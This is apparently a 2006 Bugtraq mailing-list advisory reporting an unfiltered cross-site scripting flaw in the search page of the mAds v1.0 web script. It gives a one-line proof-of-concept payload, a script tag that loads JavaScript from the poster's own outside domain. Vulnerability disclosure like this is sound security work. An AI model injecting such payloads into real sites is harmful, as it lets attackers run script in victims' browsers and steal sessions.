[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
mAds v1.0
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: mAds v1.0
- From: lunY@xxxxxxxxxxxxxxx
- Date: 30 Jun 2006 23:11:01 -0000
mAds v1.0
Homepage:
http://lowpricescripts.com/product_info.php?products_id=51
Affected files:
*Searching
-----------------------------------
XSS vuln when searching:
Like the hotbot XSS vuln, when searching mAds returns with its results they are
generated dynamically on screen, with no filtering at all. For a PoC as your
search string put in:
<script src=http://www.youfucktard.com/xss.js></script>
Screenshots:
http://www.youfucktard.com/xsp/mads1.jpg
Im sure other vulnerabilities aside from XSS could be also possible due to this.
------------------------------------